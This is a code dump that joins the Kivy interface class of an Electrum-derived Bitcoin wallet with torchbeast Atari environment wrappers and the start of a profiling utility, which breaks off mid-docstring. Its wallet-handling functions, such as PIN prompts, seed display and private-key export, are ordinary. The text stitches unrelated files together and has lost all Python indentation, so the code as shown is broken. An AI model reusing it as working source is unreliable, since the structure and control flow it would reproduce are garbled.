'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Koinon Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, on_qr_failure)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.perf_counter()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, wallet):
if wallet: # wizard returned a wallet
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
wizard = Factory.InstallWizard(self.electrum_config, self.plugins, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize the UX part of Electrum. This function performs the basic
tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
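# server_lag > 1 means the connected server's reported height is behind our local chain tip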
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
from electrum.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Koinon', message,
app_icon=icon, app_name='Koinon Electrum Wallet')
except ImportError:
Logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
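# Ask for the PIN again if the app was paused for more than 60 seconds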
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except Exception as e:
ok, msg = False, repr(e)
else:
ok, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(ok, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
display_msg = _('The server returned an error when broadcasting the transaction.')
if msg:
display_msg += '\n' + msg
display_msg = display_msg[:500]
self.show_error(display_msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
impala.py
|
# https://github.com/facebookresearch/torchbeast/blob/master/torchbeast/core/environment.py
import numpy as np
from collections import deque
import gym
from gym import spaces
import cv2
cv2.ocl.setUseOpenCL(False)
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset(**kwargs)
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(self.noop_action)
if done:
obs = self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class FireResetEnv(gym.Wrapper):
def __init__(self, env):
"""Take action on reset for environments that are fixed until firing."""
gym.Wrapper.__init__(self, env)
assert env.unwrapped.get_action_meanings()[1] == 'FIRE'
assert len(env.unwrapped.get_action_meanings()) >= 3
def reset(self, **kwargs):
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(1)
if done:
self.env.reset(**kwargs)
obs, _, done, _ = self.env.step(2)
if done:
self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class EpisodicLifeEnv(gym.Wrapper):
def __init__(self, env):
"""Make end-of-life == end-of-episode, but only reset on true game over.
Done by DeepMind for the DQN and co. since it helps value estimation.
"""
gym.Wrapper.__init__(self, env)
self.lives = 0
self.was_real_done = True
def step(self, action):
obs, reward, done, info = self.env.step(action)
self.was_real_done = done
# check current lives, make loss of life terminal,
# then update lives to handle bonus lives
lives = self.env.unwrapped.ale.lives()
if lives < self.lives and lives > 0:
# for Qbert sometimes we stay in lives == 0 condition for a few frames
# so it's important to keep lives > 0, so that we only reset once
# the environment advertises done.
done = True
self.lives = lives
return obs, reward, done, info
def reset(self, **kwargs):
"""Reset only when lives are exhausted.
This way all states are still reachable even though lives are episodic,
and the learner need not know about any of this behind-the-scenes.
"""
if self.was_real_done:
obs = self.env.reset(**kwargs)
else:
# no-op step to advance from terminal/lost life state
obs, _, _, _ = self.env.step(0)
self.lives = self.env.unwrapped.ale.lives()
return obs
class MaxAndSkipEnv(gym.Wrapper):
def __init__(self, env, skip=4):
"""Return only every `skip`-th frame"""
gym.Wrapper.__init__(self, env)
# most recent raw observations (for max pooling across time steps)
self._obs_buffer = np.zeros((2,)+env.observation_space.shape, dtype=np.uint8)
self._skip = skip
def step(self, action):
"""Repeat action, sum reward, and max over last observations."""
total_reward = 0.0
done = None
for i in range(self._skip):
obs, reward, done, info = self.env.step(action)
if i == self._skip - 2: self._obs_buffer[0] = obs
if i == self._skip - 1: self._obs_buffer[1] = obs
total_reward += reward
if done:
break
# Note that the observation on the done=True frame
# doesn't matter
max_frame = self._obs_buffer.max(axis=0)
return max_frame, total_reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
def __init__(self, env):
gym.RewardWrapper.__init__(self, env)
def reward(self, reward):
"""Bin reward to {+1, 0, -1} by its sign."""
return np.sign(reward)
class WarpFrame(gym.ObservationWrapper):
def __init__(self, env, width=84, height=84, grayscale=True, dict_space_key=None):
"""
Warp frames to 84x84 as done in the Nature paper and later work.
If the environment uses dictionary observations, `dict_space_key` can be specified which indicates which
observation should be warped.
"""
super().__init__(env)
self._width = width
self._height = height
self._grayscale = grayscale
self._key = dict_space_key
if self._grayscale:
num_colors = 1
else:
num_colors = 3
new_space = gym.spaces.Box(
low=0,
high=255,
shape=(self._height, self._width, num_colors),
dtype=np.uint8,
)
if self._key is None:
original_space = self.observation_space
self.observation_space = new_space
else:
original_space = self.observation_space.spaces[self._key]
self.observation_space.spaces[self._key] = new_space
assert original_space.dtype == np.uint8 and len(original_space.shape) == 3
def observation(self, obs):
if self._key is None:
frame = obs
else:
frame = obs[self._key]
if self._grayscale:
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)
frame = cv2.resize(
frame, (self._width, self._height), interpolation=cv2.INTER_AREA
)
if self._grayscale:
frame = np.expand_dims(frame, -1)
if self._key is None:
obs = frame
else:
obs = obs.copy()
obs[self._key] = frame
return obs
class FrameStack(gym.Wrapper):
def __init__(self, env, k):
"""Stack k last frames.
Returns lazy array, which is much more memory efficient.
See Also
--------
baselines.common.atari_wrappers.LazyFrames
"""
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
self.observation_space = spaces.Box(low=0, high=255, shape=(shp[:-1] + (shp[-1] * k,)), dtype=env.observation_space.dtype)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return self._get_ob()
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._get_ob(), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
class ScaledFloatFrame(gym.ObservationWrapper):
def __init__(self, env):
gym.ObservationWrapper.__init__(self, env)
self.observation_space = gym.spaces.Box(low=0, high=1, shape=env.observation_space.shape, dtype=np.float32)
def observation(self, observation):
# careful! This undoes the memory optimization, use
# with smaller replay buffers only.
return np.array(observation).astype(np.float32) / 255.0
class LazyFrames(object):
def __init__(self, frames):
"""This object ensures that common frames between the observations are only stored once.
It exists purely to optimize memory usage which can be huge for DQN's 1M frames replay
buffers.
This object should only be converted to numpy array before being passed to the model.
You'd not believe how complex the previous solution was."""
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=-1)
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
def count(self):
frames = self._force()
return frames.shape[frames.ndim - 1]
def frame(self, i):
return self._force()[..., i]
def make_atari(env_id, max_episode_steps=None):
env = gym.make(env_id)
assert 'NoFrameskip' in env.spec.id
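# The base environment must not skip frames itself; MaxAndSkipEnv below performs the frame skipping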
env = NoopResetEnv(env, noop_max=30)
env = MaxAndSkipEnv(env, skip=4)
assert max_episode_steps is None
return env
def wrap_deepmind(env, episode_life=True, clip_rewards=True, frame_stack=False, scale=False):
"""Configure environment for DeepMind-style Atari.
"""
if episode_life:
env = EpisodicLifeEnv(env)
if 'FIRE' in env.unwrapped.get_action_meanings():
env = FireResetEnv(env)
env = WarpFrame(env)
if scale:
env = ScaledFloatFrame(env)
if clip_rewards:
env = ClipRewardEnv(env)
if frame_stack:
env = FrameStack(env, 4)
return env
class ImageToPyTorch(gym.ObservationWrapper):
"""
Image shape to channels x width x height
"""
def __init__(self, env):
super(ImageToPyTorch, self).__init__(env)
old_shape = self.observation_space.shape
self.observation_space = gym.spaces.Box(
low=0,
high=255,
shape=(old_shape[-1], old_shape[0], old_shape[1]),
dtype=np.uint8,
)
def observation(self, observation):
return np.transpose(observation, axes=(2, 0, 1))
def wrap_pytorch(env):
return ImageToPyTorch(env)
"""Naive profiling using timeit. (Used in MonoBeast.)"""
import collections
import timeit
class Timings:
"""Not thread-safe."""
def __init__(self):
self._means = collections.defaultdict(int)
self._vars = collections.defaultdict(int)
self._counts = collections.defaultdict(int)
self.reset()
def reset(self):
self.last_time = timeit.default_timer()
def time(self, name):
"""Save an update for event `name`.
